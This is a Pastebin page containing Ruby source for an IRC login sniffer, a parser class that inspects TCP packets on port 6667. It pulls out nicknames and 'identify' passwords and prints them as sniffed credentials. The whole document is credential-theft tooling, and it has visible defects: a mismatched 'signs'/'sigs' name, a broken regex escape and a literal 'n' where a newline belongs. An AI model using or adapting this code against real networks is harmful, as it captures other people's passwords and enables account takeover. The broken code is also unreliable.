Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- class SnifferIRC < BaseProtocolParser
- #-- function 1
- def register_sigs
- self.sigs = {
- :user => /^(nick\s+[^\n]+)/si,
- :password => /b(identify\s+[^\n]+)/si,
- }
- end
- #-- function 2
- def parse(pkt)
- return if not pkt[:tcp]
- return if (pkt[:tcp].src_port != 6667 and pkt[:tcp].dst_port != 6667)
- # if package is comming from server
- if(pkt[:tcp].src_port == 6667)
- s = find_session("#{pkt[:ip].src_ip}:#{pkt[:tcp].src_port}-#{pkt[:ip].dst_ip}:#{pkt[:tcp].dst_port}")
- # if package is sent to server
- else
- s = find_session("#{pkt[:ip].dst_ip}:#{pkt[:tcp].dst_port}-#{pkt[:ip].src_ip}:#{pkt[:tcp].src_port}")
- end
- self.sigs.each_key do |k|
- matched = nil
- matches = nil
- if(pkt[:tcp].payload_data =~ self.signs[k])
- matched = k
- matches = $&.split(/ /)[1]
- end
- case matched
- when :user
- s[:user] = matches
- puts "Welcome #{s[:user]}"
- when :password
- s[:password] = matches
- if ( s[:user] and s[:password])
- print "-> IRC login sniffed: #{s[:session]} >> user: #{s[:user]} password: #{s[:password]}n"
- end
- sessions.delete(s[:session])
- when nil
- sessions[s[:session]].merge!({k => matches})
- end
- end
- end
- end
Add Comment
Please, Sign In to add comment